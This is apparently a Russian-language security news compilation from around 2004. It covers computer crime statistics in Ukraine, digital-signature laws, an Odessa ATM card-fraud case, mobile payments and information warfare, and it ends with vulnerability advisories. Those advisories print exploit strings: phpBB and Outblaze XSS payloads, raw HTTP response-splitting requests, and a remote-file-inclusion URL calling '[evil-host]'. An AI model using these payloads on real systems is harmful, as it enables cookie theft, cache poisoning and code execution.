Компьютерная преступность в Украине - борьба продолжается

Как известно, в Украине принят ряд новых законов - Законы "Об электронной цифровой подписи" и “Об электронном документе и электронном документообороте”. Данные Законы, как и Закон Украины "О защите информации в автоматизированных системах", являются определяющими в сфере использования информации в электронном виде - "электронной информации". Следующим этапом создания механизма реализации положений законов должны стать разработка и принятие подзаконных нормативно-правовых актов, создание и функционирование стандартов и сертификатов в сфере электронной информации, Центров верификации электронной подписи (в Российской Федерации подобный Центр уже начал работу в тестовом режиме), механизмов страхования рисков и т.д. При условии расширения сферы использования и широкого внедрения информационных технологий в процессы руководства производством и коммерцией, данные процессы в экономике Украины активизируются и воплотятся быстрее, что, в свою очередь, корреляционно обусловит необходимость в нормативном и нормативно-техническом урегулировании процессов информатизации в обществе.

Данные позитивные процессы информатизации в Украине сопровождаются ростом преступных проявлений в сфере компьютерных и интернет-технологий. С целью противодействия им в структуре ГСБЕП при МВД Украины еще в 2001 году были созданы подразделения по борьбе с правонарушениями в сфере интеллектуальной собственности и высоких технологий, одной из задач которых определена борьба с преступлениями в сфере компьютерной информации, электронных платежей и телекоммуникаций.

По признакам статей XVI раздела Уголовного кодекса Украины (о преступлениях в сфере использования компьютеров, их систем и компьютерных сетей) за 4 месяца 2001 года было выявлено 7 преступлений; в 2002 году - 25 (подразделениями ГСБЕП – 22 или 88 процентов); в 2003 году - 151 преступление, а за 6 месяцев 2004 г. - 94. Необходимо отметить, что квалификация выявленных ГСБЕП преступных действий в сфере компьютерных и интернет-технологий, кроме статей XVI раздела УК Украины, осуществляется также по признакам статей о хищениях, причинении ущерба, незаконных действиях с документами на перевод и другими средствами доступа к банковским счетам, о незаконных действиях в отношении информации с ограниченным доступом и т.д.

Среди проблемных вопросов борьбы с преступлениями в сфере компьютерных и интернет-технологий можно выделить следующие:
1. Несовершенство законодательства и связанные с этим вопросы квалификации и актуальности борьбы с компьютерной преступностью.
2. Трудности организации и проведения компьютерных экспертиз.
3. Трудности проведения мер оперативно-технического документирования преступных действий лиц.
4. Отсутствие практики и механизмов раскрытия "транснациональных" компьютерных преступлений с территориально-распределенными и нестабильными во времени следами, а также проведение в дальнейшем следственных действий в отношении лиц, которые должны дать показания в качестве потерпевшего, подозреваемого, свидетеля.
5. Латентность преступлений, в связи с отсутствием уверенности потерпевшей стороны в наказании виновных, возврате потерянных денежных средств и необходимости сохранения престижа. Для заявителя также существует проблема длительного изъятия собственной компьютерной и коммутационной техники, в качестве вещественного доказательства, с необходимой для расследования электронной информацией, которое может длиться несколько месяцев.
6. Отсутствие достаточного опыта и наработок по выявлению и раскрытию преступлений, расследования следственными подразделениями уголовных дел, а также рассмотрению в судах преступлений, совершенных в сфере компьютерных и интернет-технологий.

Президент Киргизии подписал закон "Об электронной цифровой подписи".

Президент Киргизии Аскар Акаев подписал закон "Об электронной цифровой подписи".

В пресс-службе главы государства сообщили во вторник, что законом устанавливаются правовые основы для использования в республике электронных цифровых подписей в процессах обмена электронными сообщениями, при соблюдении которых такая подпись признается равнозначной собственноручной подписи.

Нормами закона установлены принципы и условия использования электронной цифровой подписи, обеспечиваются правовые условия предоставления услуг по удостоверению электронных цифровых подписей. Также законом устанавливается порядок использования такой подписи в сфере государственного управления, корпоративных информационных сетях и платежной системе Киргизии.

В пресс-службе отметили, что подписанный документ будет способствовать дальнейшей интеграции Киргизии в мировое сообщество, так как электронные цифровые подписи активно используются во многих государствах мира.

США призывают Россию ужесточить борьбу с компьютерными пиратами

Международный альянс интеллектуальной собственности (International Intellectual Property Alliance (IIPA) обратился к президенту Соединенных Штатов Джорджу Бушу с просьбой отменить льготный торговый режим для России в случае, если она к октябрю текущего года не достигнет ощутимых результатов в борьбе с пиратством, заявив при этом, что Россия постепенно становится одним из крупнейших в мире экспортеров пиратских копий на оптических носителях.

Следует отметить, что администрация президента США прислушивается к заявлениям Альянса и принимает определенные меры к нарушителям законодательства об интеллектуальной собственности и авторских правах.

Неделю назад администрация Буша-младшего предоставила 90 дней Бразилии, чтобы последняя устранила аналогичные претензии IIPA, высказанные три года назад. В противном случае, Белый дом угрожает лишить Бразилию права на льготный экспорт своей продукции в США на сумму свыше 2,5 млрд. долларов.

Замминистра торговли США Уильям Лэш призвал власти России ужесточить ответственность за нарушение прав интеллектуальной собственности. "Постоянное закрытие "пиратских" производств и реальные приговоры "пиратам", предусматривающие для них тюремное заключение - вот что требуется от России и в соответствии с международными правовыми стандартами и в соответствии с двусторонним российско-американским торговым соглашением", - заявил Уильям Лэш, посетовав на колоссальные масштабы "пиратского" производства в России. По его словам, лицензионных DVD на российском рынке ежегодно продается около 30 млн., а пиратских - вдесятеро больше.

Расследуется уголовное дело одесских кардеров

Как сообщалось ранее на Crime-research, сотрудники одесского УБОПа взяли с поличным мошенников, подозреваемых в краже через банкоматы при помощи поддельных пластиковых карточек около полумиллиона долларов со счетов уже печально известного (по делу Левина) нью-йоркского "Ситибанка".

В Украине стремительно развивается рынок пластиковых карт. Средние темпы прироста составляют 20-22%. Бум возник после того, как так называемые зарплатные проекты банков, сделавшие очень удобным процесс получения денежного довольствия, были взяты на вооружение руководством множества различных организаций. Вместе с объемами таких операций растет и уровень "пластиковой" преступности.

Мы уже сообщали о задержании 11 января 2004 года сотрудниками одесского УБОПа с поличным четырех мошенников, подозреваемых в краже через банкоматы при помощи поддельных пластиковых карточек около полумиллиона долларов со счетов одного из известнейших в мире банков.

Задержали их в тот момент, когда они снимали очередные $10 тысяч. Во время обысков у них были изъяты поддельные карточки, заготовки для будущих фальшивок, крупная сумма денег в гривнах, а также устройство для нанесения магнитной ленты на пластиковые карты. Экспертиза, проведенная Научно-исследовательским криминалистическим центром УВМД, а затем подтвержденная научно-исследовательский институт судебной экспертизы Министерства юстиции Украины подтвердила факт использования этих карт в деятельности обвиняемых.

Подозреваемым было предъявлено обвинение по ст.190 ч.4 Уголовного кодекса Украины - хищение в особо крупных размерах и ст. 200 ч.2 УК - незаконные действия с документами и платежными картами для доступа к банковским счетам.

Как сообщает агентство «УНИАН», в июле уголовное дело относительно четырех граждан Украины, относящихся к международной преступной группировке "кардеров" (кардер - человек, производящий незаконные операции с кредитными карточками других лиц) по указанию Генеральной прокуратуры поступило в следственный отдел областной прокуратуры из следственного управления УМВД в Одесской области. Об этом сообщил первый заместитель прокурора Одесской области Михаил Черный.

По его словам, в связи с неординарностью совершенного преступления, а также с тем, что среди подозреваемых - работники правоохранительных органов Одессы, расследованием данного резонансного дела будет заниматься именно областная прокуратура.

Ставшие жертвами кардеров владельцы пластиковых карт все как один сомневаются в том, что деньги им будут возвращены. Многие обвиняют банки: дескать, те бессильны предотвратить хищения. Банкиры же, в свою очередь, заявляют, что делают все возможное, дабы защитить клиентов. Но кражи, по их твердому убеждению, неизбежны - они случаются не только у нас, но и в других странах. И кивают в сторону правоохранителей, которые должны разоблачать мошенников.

Аппаратное решение для борьбы со спамом и вирусами

Система безопасности Microsoft переживает тяжелые времена

60% компаний готовы отказаться от электронной почты

Компания MessageLabs, специализирующаяся на средствах безопасности для электронной почты, опросила представителей IT-компаний и выяснила, что 60% фирм готовы и вовсе отказаться от использования e-mail, если ситуация с распространением вирусов и спама не изменится в лучшую сторону.

Оставшиеся 40% признали, что испытывают "волнение" в связи с угрозами их бизнесу, так или иначе исходящими от электронной почты. Только 29% выразили хоть какой-то "оптимизм" по этому поводу.

15% думают, что электронная почта в последующее десятилетие не претерпит серьезных изменений, в то время как две трети считают, что это e-mail сольется с другими видами коммуникаций, вроде беспроводной и мгновенной передачи данных.

14% уверены, что e-mail через какое-то время безнадежно устареет.

Что же касается самой серьезной угрозы, то 20% назвали онлайновое мошенничество и воровство конфиденциальной информации, вирусы "собрали" 21%.

Мобильник превращается в кошелек и паспорт

Мобильный телефон становится по-настоящему незаменимой вещью. Для начала из удобного средства связи он превратился в терминал для игр, затем в радио, потом в фотоаппарат и видеокамеру, а с недавних пор начал выполнять роль кошелька и даже паспорта. Расплатиться в магазине с помощью своего мобильника теперь могут не только передовые в плане технологий японцы, но и россияне.

Начиная с этой недели владельцы телефонов, подключенных к сети самого крупного в Японии оператора сотовой связи NTT DoCoMo, могут выходить из дома без кошелька и документов. Эти функции выполняют их сотовые телефоны. На кассе продавец подносит мобильник к специальному сканеру, и с банковского счета покупателя считывается причитающаяся за выбранные товары сумма.

Превращение трубки в средство платежа происходит за счет использования чипа FeliCa, произведенного компанией Sony. Привлекательность технологии обеспечивает ее простота в использовании и невысокая стоимость: несколько долларов за чип и несколько сотен за оборудование для торговых точек. Примеру NTT DoCoMo в ближайшем будущем готовы последовать конкуренты - KDDI и Vodafone. Сейчас они проводят испытание подобной технологии.

Совершенно неожиданно в этой области технически передовую Японию смогла обогнать Россия. Оплата различных услуг с помощью мобильных телефонов МТС больше года назад стала реальностью для жителей нескольких российских городов. Хотя этот сервис мало знаком москвичам и питерцам, примерно 20 тысяч жителей Новосибирска, Челябинска, Магнитогорска и Благовещенска уже больше года имеют возможность оплачивать через систему мобильных платежей SimMP товары и услуги. Правда, в отличие от японской, в российской технологи ставка сделана на SMS-сообщения. Они становятся все более популярными, а технология на их базе дешевле, чем японские терминалы, и не требует установки дополнительного оборудования. «Это позволяет очень быстро подключать к системе новые торговые точки, - пояснила ГАЗЕТЕ руководитель отдела брендинга «Системы мобильных платежей SimMP» Анна Пашкевич. - Кроме того, технология SMS-сообщений, на которой построено общение клиента с банком в нашем случае, делает возможной работу сервиса в роуминге. Это особенно удобно при оплате сотовой связи, потому что у тех, кто находится в другом городе, нередко возникает проблема с пополнением баланса лицевого счета».

В Новосибирске через мобильник также можно заплатить по счету в ресторане, такси и кинотеатрах. В Челябинске - оплатить бензин на заправке, купить фишки в казино. В ближайшем будущем, нажав несколько кнопок на телефоне, можно будет купить валюту, погасить кредит или перевести деньги с одного банковского счета на другой.

«Мы давно вводим эту услугу и считаем ее перспективной, - сказал ГАЗЕТЕ директор по связям с общественностью ОАО «ВымпелКом» Михаил Умаров. - Эти услуги объединены под брендом «Мобильный кошелек». Абонент имеет возможность оплатить услуги связи, доступ в Интернет, купить билеты на концерты и в театр, сделать ставку в казино». «Абоненту нужны дополнительные услуги, - считает пресс-секретарь МТС Павел Нефедов. - Человек привык носить в кармане телефон, и сейчас ему мало просто возможности говорить по нему. Оператор заинтересован в том, чтобы абоненты получали больше пользы от того, что они владеют сотовыми телефонами».

Тем не менее пока оплата услуг через мобильный телефон - сервис скорее экзотический. Об этом можно судить хотя бы по тому, что у нас пока плохо приживаются привычные для всего мира банковские карты. «Россияне больше доверяют наличным деньгам, чем банковским картам, - считает советник генерального директора компании «МегаФон-Москва» Роман Проколов. - Так что время, когда мобильные платежи станут реальностью в России, наступит не завтра».

СПРАВКА

В России технология SimMP работает следующим образом: покупатель называет продавцу номер своего телефона, после чего ему приходит SMS со счетом на оплату, он подтверждает платеж PIN-кодом SimMP. Деньги списываются в течение полутора-двух минут. Для доступа к мобильным платежам нужна специальная SIM-карта, которая вставляется в телефон вместо обычной. SimMP не берет комиссию за услугу, однако в некоторых городах клиенты сотовых операторов платят абонентскую плату банкам - максимум доллар в месяц.

Угрозы и вызовы в сфере информационной безопасности

Анализ закономерностей развития современного человечества говорит о том, что мир находится на пороге глобального информационного общества, общества цивилизационных перемен, предвещающего кардинальные изменения во всех сферах личной и общественной жизни. В условиях формирования информационного общества необходима выверенная государственная информационная политика. Значение ее возрастает в условиях информационной борьбы, и, особенно, в условиях психологических войн. Так, Доктрина информационной безопасности Российской Федерации относит к внешним источникам угроз безопасности России разработку рядом государств концепций информационных войн; разработанные Советом Безопасности России «Основы государственной политики в области обеспечения информационно-психологической безопасности» определяют государственную информационную политику в условиях информационной войны как центральный компонент системы обеспечения информационно-психологической безопасности и одновременно указывают на неэффективность использования общих принципов, средств и методов существующей сегодня информационной политики в условиях острых информационно-психологических конфликтов; Парламентские слушания «Угрозы и вызовы в сфере информационной безопасности» указывают не только на неэффективность действующей государственной информационной политики в условиях психологических войн, но и предполагают, что возможной причиной такой неэффективности может являться принципиальная неприменимость общих форм и методов политического регулирования в специальных, или особых, условиях, которые создает информационно-психологическая война.

Информационно-психологическое воздействие - наиболее эффективный и универсальный инструмент внешней и внутренней политики, предоставляющий силам, участвующим в политической борьбе, уникальные (в том числе – по поражающей мощи) возможности для скрытого управления политической системой, нанесения ущерба политическим оппонентам и манипулирования ими в собственных целях, т.е. именно те возможности, обладать которыми стремятся любые политические силы. Именно это стремление политической элиты (существование среди политической элиты ведущих стран мира заказчиков этой продукции и быстро растущего рынка ее потребителей) способствует быстрому развитию и совершенствованию организационных, технологических форм и методов информационно-психологической войны, становящихся обязательным элементом современной политической борьбы. Сложившаяся проблемная ситуация в данной области определяется несоответствием темпов развития организационных технологий информационно-психологической агрессии и технологий психологической защиты сознания, системы ценностей и психического здоровья общества от негативного психологического воздействия.



Подробнее : http://www.crime-research.ru/articles/Manoilo1/

Межcайтовый скриптинг и Response Splitting Attacks в phpBB форуме

Программа: phpBB до версии 2.0.10 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость в phpBB позволяет удаленному пользователю выполнить XSS нападение. 1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример: http://SERVER/phpBB2/search.php?search_author='<script>alert(document.cookie)</script> Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в http://www.sanctuminc.com/pdf/WhitePaper_HTTPResponse.pdf). Удаленный пользователь может отравить Кеш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса: POST /phpBB2/login.php HTTP/1.0 Host: SERVER User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-Type: application/x-www-form-urlencoded Content-length: 129 logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! Еще пример: GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d %0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha! HTTP/1.0 Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.7 [en] (WinNT; I) Host: SERVER URL производителя:http://www.phpbb.com/ Решение:Установите последнюю версию сервера: http://www.phpbb.com/downloads.php

Две уязвимости в PlaySMS

Программа: PlaySMS 0.6 и более ранние версии Опасность: Высокая Наличие эксплоита: Нет Описание: Две уязвимости обнаружено в PlaySMS. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может внедрить Sql команды. Удаленный пользователь может заставить систему включить и выполнить произвольный PHP файл с привилегиями целевого Web сервера. Также сообщается что удаленный пользователь может представить специально обработанный запрос, чтобы внедрить SQL команды, которые будет выполнены на основной базе данных. Дополнительные подробности не раскрываются. URL производителя: http://playsms.sourceforge.net/web/ Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=97032&package_id=103784

Удаленное переполнение буфера в Whisper FTP Surfer

Программа: Whisper FTP Surfer 1.0.7 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость в Whisper FTP Surfer позволяет удаленному FTP серверу выполнить произвольный код на подключенном клиенте. Когда клиент пытается открыть файл с длинным именем файла из FTP сервера и затем закрыть его, переполнение буфера может произойти, когда клиент удаляет временный файл с чрезмерно длинным именем. Уязвимость трудна для эксплуатации. URL производителя:http://www.whispertech.com/surfer/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Межсайтовый скриптинг в Outblaze E-mail

Программа: Outblaze E-mail Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость в Outblaze E-mail позволяет удаленному пользователю выполнить XSS нападение. Пример/Эксплоит: <IMG SRC="javasc ript:alert (document.cookie)";" border="0" height="1" width="1"> URL производителя:http://www.outblaze.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное выполнение произвольного кода в artmedic kleinanzeigen

Программа: artmedic kleinanzeigen Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость в artmedic kleinanzeigen позволяет удаленному пользователю выполнить произвольный код на целевой системе. Пример/Эксплоит: [target]/artmedic-kleinanzeigen-path/index.php?id=http://[evil-host] URL производителя:http://www.artmedic-phpscripts.de/artmedic_kleinanzeigen.php Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Локальный отказ в обслуживании в Sun Solaris в Solaris Volume Manager (SVM)

Программа: Sun Solaris 9 Опасность: Низкая Наличие эксплоита: Нет Описание: Отказ в обслуживании в Sun Solaris в Solaris Volume Manager (SVM) устройствах позволяет локальному пользователю вызвать панику системы. Локальный пользователь может вызвать злонамеренный запрос, чтобы вызвать панику ядра. Уязвимы только системы, в которых конфигурированы SVM устройства. URL производителя:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57598 Решение:Установите соответствующие обновления: SPARC Platform Solaris 9 with patch 113073-13 or later x86 Platform Solaris 9 with patch 113994-22 or later